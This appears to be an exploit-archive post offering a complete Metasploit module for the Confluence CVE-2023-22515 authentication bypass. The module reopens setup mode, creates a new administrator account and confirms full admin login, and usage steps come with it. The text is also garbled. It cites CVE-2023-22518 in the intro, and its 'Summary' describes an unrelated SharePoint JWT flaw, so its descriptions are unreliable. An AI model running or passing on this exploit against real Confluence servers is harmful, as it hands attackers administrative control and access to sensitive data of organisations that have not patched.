Confluence 8.x Privilege Escalation

Confluence 8.x versions have been susceptible to critical privilege escalation Confluence 8.x versions have been susceptible to critical privilege escalation vulnerabilities. A notable example (e.g., CVE-2023-22518) allows an unauthenticated attacker to exploit improper authorization.

By targeting specific setup or administrative endpoints, such as `/setup/setupadministrator.action`, an attacker can bypass security checks. This enables them to create a new administrator account for the Confluence instance. Upon successful creation, the attacker gains full administrative control, escalating privileges from unauthenticated to complete system access.

This allows for data manipulation, unauthorized access to sensitive content, and further compromise. Prompt patching to patched versions is essential to secure instances against such threats.

=============================================================================================================================================
| # Title : Confluence 8.x Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.atlassian.com/software/confluence |
=============================================================================================================================================

POC :

1. Summary :
a critical authentication bypass vulnerability in Microsoft SharePoint known as CVE?2023?29357. (https://packetstorm.news/files/id/207960/)
The flaw allows an attacker to craft an unsigned JWT token with "alg": "none" and impersonate any SharePoint user,
including Site Administrators, without possessing valid credentials.
The vulnerability is dangerous because it exposes internal SharePoint APIs and may enable privilege escalation or full system compromise.

===============
# Save & Usage
===============

1. Save module as:
modules/auxiliary/admin/http/confluence_cve_2023_22515.rb

2. Reload Metasploit:
msfconsole
reload_all

3. Use module:
use auxiliary/admin/http/confluence_cve_2023_22515

4. Set options:
set RHOSTS https://target.com
set TARGETURI /
set USERNAME pleasepatch
set PASSWORD Password2

5. Run:
run
-------------------------
auxiliary :
-------------------------
##
# This file is part of the Metasploit Framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Atlassian Confluence Unauthenticated Privilege Escalation (CVE?2023?22515)',
'Description' => %q{
This module exploits CVE-2023-22515, an authentication bypass and setup
reopening vulnerability in Atlassian Confluence Data Center and Server.

An attacker can force Confluence into setup mode, then create a NEW
administrator account and authenticate with full admin privileges.

This module replicates the exact behavior of the PoC Python script:
1- trigger vulnerability via /server-info.action?setupComplete=false
2- create admin user
3- authenticate via REST API
},
'Author' => [
'Chocapikk - PoC',
'indoushka - Full Metasploit conversion'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2023-22515'],
['URL', 'https://github.com/Chocapikk/CVE-2023-22515']
],
'Platform' => 'linux',
'Arch' => ARCH_ALL,
'Targets' => [['Automatic', {}]],
'DisclosureDate' => '2023-10-04',
'DefaultTarget' => 0
))

register_options(
[
OptString.new('TARGETURI', [true, 'Base path', '/']),
OptString.new('USERNAME', [true, 'Admin username to create', 'pleasepatch']),
OptString.new('PASSWORD', [true, 'Admin password to create', 'Password2'])
]
)
end

#
# Check Vuln
#
def check
v = trigger_setup
return Exploit::CheckCode::Vulnerable if v
Exploit::CheckCode::Safe
end

#
# Exploit
#
def exploit
print_status("Triggering setup mode bypass on target...")
unless trigger_setup
fail_with(Failure::NotVulnerable, 'Could not reopen setup mode.')
end

print_good("Setup mode reopened successfully ?")

print_status("Creating new administrator account...")
unless create_admin
fail_with(Failure::UnexpectedReply, 'Failed to create admin user')
end

print_good("Admin account created successfully ?")

print_status("Authenticating to REST API as #{datastore['USERNAME']} ...")

if authenticate_user
print_good("Successfully logged in as #{datastore['USERNAME']}! ? FULL ADMIN PWNED ?")
else
fail_with(Failure::NoAccess, 'Authentication failed after account creation')
end
end

#
# Step 1 ? Trigger vulnerability
#
def trigger_setup
send_req(
"GET",
normalize_uri(target_uri.path, "server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false")
)&.code == 200
end

#
# Step 2 ? Create Admin
#
def create_admin
data = {
"username" => datastore['USERNAME'],
"fullName" => datastore['USERNAME'],
"email" => "#{datastore['USERNAME']}@localhost",
"password" => datastore['PASSWORD'],
"confirm" => datastore['PASSWORD'],
"setup-next-button" => "Next"
}

res = send_req("POST", normalize_uri(target_uri.path, "setup", "setupadministrator.action"), data)

return false unless res

if res.body.include?("Setup Successful") ||
res.body.include?("A user with this username already exists")
return true
end

false
end

#
# Step 3 ? Validate Login
#
def authenticate_user
auth = Rex::Proto::Http::Client::BasicAuthHeader.new(
datastore['USERNAME'],
datastore['PASSWORD']
)

res = send_req(
"GET",
normalize_uri(target_uri.path, "rest/api/user?username=#{datastore['USERNAME']}"),
nil,
auth
)

return false unless res && res.code == 200
true
end

#
# Unified request
#
def send_req(method, uri, data=nil, auth=nil)
begin
send_request_cgi({
'method' => method,
'uri' => uri,
'ctype' => 'application/x-www-form-urlencoded',
'data' => data,
'authorization' => auth ? auth.to_s : nil,
'headers' => {
"X-Atlassian-Token" => "no-check",
"User-Agent" => "Metasploit - CVE-2023-22515"
}
}, 5)
rescue ::Rex::Error::RequestTimeout
return nil
end
end
end

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================